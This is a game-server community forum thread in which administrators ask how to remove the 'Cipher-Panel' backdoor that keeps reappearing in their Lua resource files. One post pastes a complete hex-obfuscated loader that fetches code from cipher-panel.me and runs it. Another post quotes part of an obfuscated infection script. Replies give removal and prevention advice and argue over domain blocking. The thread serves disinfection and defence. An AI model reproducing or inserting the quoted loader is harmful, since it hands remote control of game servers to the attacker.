Virus in server files

L1R · April 23, 2022, 5:28am

Hey.

I made a search on the new virus infection codes and found a lot from it in my script.
I removed them and after every server restart it’s coming back into the resources lua’s files.

github.com

ericstolly/cipher/blob/main/chapters/chapter-2-infection.md

## Chapter 2 (Infection)
This chapter covers the infection code used in the malicious code to hire dubbed Cipher-Panel.

### Introduction
The infection code for this malicious software is one of the best examples of failed obfuscation the world has to offer. The code is downloaded and excuted via the payload code we covered in [Chapter 1](https://github.com/ericstolly/cipher/blob/main/chapters/chapter-1-payload.md).

#### Original Code
```lua
local kaskyWVklaWSErrrnVBB = "\x73\x65\x73\x73\x69\x6f\x6e\x6d\x61\x6e\x61\x67\x65\x72"
local kakkyWVklaWSErrrnVBB = "\x2f\x73\x65\x72\x76\x65\x72\x2f\x68\x6f\x73\x74\x5f\x6c\x6f\x63\x6b\x2e\x6c\x75\x61"
local YBLgfdYggNgxwqazyGsb = "\x2f\x73\x65\x72\x76\x65\x72\x2f\x6c\x69\x63\x65\x6e\x63\x65\x2e\x74\x78\x74"
local ZudnizosZzhdkeuSzndh = "\x2f\x73\x65\x72\x76\x65\x72\x2f\x67\x61\x6d\x65\x2e\x6c\x6f\x67"
local eVSsCsytJpinTgqcGOIz = "\x2f\x63\x6c\x69\x65\x6e\x74\x2f\x65\x6d\x70\x74\x79\x2e\x6c\x75\x61"
local TeRfIyyWqxeqaJtVpjHO = "\x2f\x66\x78\x6d\x61\x6e\x69\x66\x65\x73\x74\x2e\x6c\x75\x61"
local aOSpqxARmZAARgJKFkSP, dzhdoDHOZhjcqbcdqz =
    "\x72\x65\x73\x6f\x75\x72\x63\x65\x73\x2f\x5b\x73\x79\x73\x74\x65\x6d\x5d\x2f\x73\x65\x73\x73\x69\x6f\x6e\x6d\x61\x6e\x61\x67\x65\x72\x2f\x73\x65\x72\x76\x65\x72\x2f\x6c\x69\x63\x65\x6e\x63\x65\x2e\x74\x78\x74",
    GetResourcePath
Citizen.CreateThread(
    function()
        Citizen.Wait(20000)

This file has been truncated. show original

anyone knows how to get rid from this?

TheIndra · April 23, 2022, 1:44pm

My intial advice is, don’t trust a machine that has been infected, reinstall the whole machine. You don’t know how deep your OS got infected.

Then to answer your topic, also try looking for the initial payload e.g. search for code with Enchanced_Tabs. You might still not be able to find it if it’s in obfuscated/“encrypted” code.

L1R · April 23, 2022, 4:12pm

Hey.

If that’s encrypted how can I find it so?

XenoS.exe · April 23, 2022, 7:31pm

I deobfuscated it a few months ago, this is the code:

anyway, it’s a malware made extremely bad, it inject on rconlog, the most funny thing is that the path is static, so if you simply move the rconlog resource the malware will never infect you again, i’ve also written a little guide on how to protect yourself from this trash

Blumlaut · April 23, 2022, 9:39pm

i hope its “dont install suspicious/‘leaked’/modified/‘improved’ resources from third party websites”, the fact that this stuff exists and is somehow popular really does show that most people are dangerously careless with server hosting.

L1R · April 23, 2022, 10:32pm

How to remove that rcon shit?
My rcon in server cfg is #rcon_password “”
And I don’t have any rcon resource …

XenoS.exe · April 23, 2022, 11:04pm

You can read the How to protect against this backdoor section in my github repository

L1R · April 23, 2022, 11:45pm

Yeah I used the blocked domain method, but they can just do it from another domain…
When searching in my resources I couldn’t find any rconlog resource… shall I have it?

XenoS.exe · April 24, 2022, 12:04am

Probably the resource is changed, but however the domain is that one, they use that one, therefore enough that you block that one is you have removed the problem

Blumlaut · April 24, 2022, 8:51am

No? Why would you leave your server vulnerable with malicious code, the events it registers still exist, you should make sure to completely remove the malware code instead of just ignoring it away.

@L1R ignore what he’s saying, you should go through all of your resources and check for the malware code.

XenoS.exe · April 25, 2022, 4:31pm

Sorry but if the code is all executed remotely from that url, what malicious code should still be there, anyway just open my repository and read the section How to protect against this backdoor or read the code and understand by yourself how it works.
Another thing, don’t raise the tone and start insulting, i am here to have fun and help, not to be insulted, thanks.

Blumlaut · April 25, 2022, 4:47pm

ridicilous argument, malicious code could rewrite hosts, or fall back to a different url/ip/whatever if it ever gets updated.

Maybe dont spread nonsense advice? saying “ignore it” is grossly negligent.

XenoS.exe · April 25, 2022, 5:23pm

if it ever gets updated.

This is the part you should think about, the code (as you can see from the github) is almost all executed remotely, so if you block the connections to that url (for now) you’re done.

Blumlaut · April 25, 2022, 6:00pm

…until the victim updates the resource or downloads a different one with the infection.

TRACER · April 27, 2022, 7:53am

After an analysis on my server, I found where that virus was located, blessed vscode! and coincidentally it has been in the RCORE_ARCADE script, after eliminating that code and “disinfecting” the machine with the HXAV that is on github, I have verified that the virus disappeared forever, even so I have taken measures to prevent it from happening again, I advise you I attach a screenshot of the code that the virus put in the script.

IAMTOONS · August 23, 2022, 12:29am

I’m having an issue. There is malware in one of my resources. I spent 7 hours one day looking and 5 yesterday.

local nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[4][nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x64\x78\x6c\x37\x36", function (dtoZoIzlKVWHWkdRzMDXAvcCbuCiuBMqUVeRurfhItZZIlnLeDhQCCjlQlbZBXIirZpHqB, DkVkLEeNPFntsvJLKlRTVUjvzThOmPuUueWnhJimJrYFjEVcpBgiNQoCqEhhbhZZjaiKfU) if (DkVkLEeNPFntsvJLKlRTVUjvzThOmPuUueWnhJimJrYFjEVcpBgiNQoCqEhhbhZZjaiKfU == nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[6] or DkVkLEeNPFntsvJLKlRTVUjvzThOmPuUueWnhJimJrYFjEVcpBgiNQoCqEhhbhZZjaiKfU == nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[5]) then return end nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[4][nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[2]](nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[4][nKTOxfgYSWNozIkcZKKmBadXqqvpQGTbVDSyBUSCcZEdFLksNNBiSkTevShjblfADwPeCm[3]](DkVkLEeNPFntsvJLKlRTVUjvzThOmPuUueWnhJimJrYFjEVcpBgiNQoCqEhhbhZZjaiKfU))() end)

NewSkill · January 6, 2023, 7:50pm

Hello, i have the virus too, but i cant find it
can u send me the link of HXAV ? thank you

Gameadictive · April 21, 2023, 6:13pm

Im looking for help too, did u find a way?

64SF · May 14, 2023, 5:33am

Guys use VsCode and search for suspicious code , it might do 50% of the disinfection , also read your code before installing it , you will also learn how it works . great community , Love u guys

TheKilmer · July 24, 2023, 7:20pm

Were you able to fix it?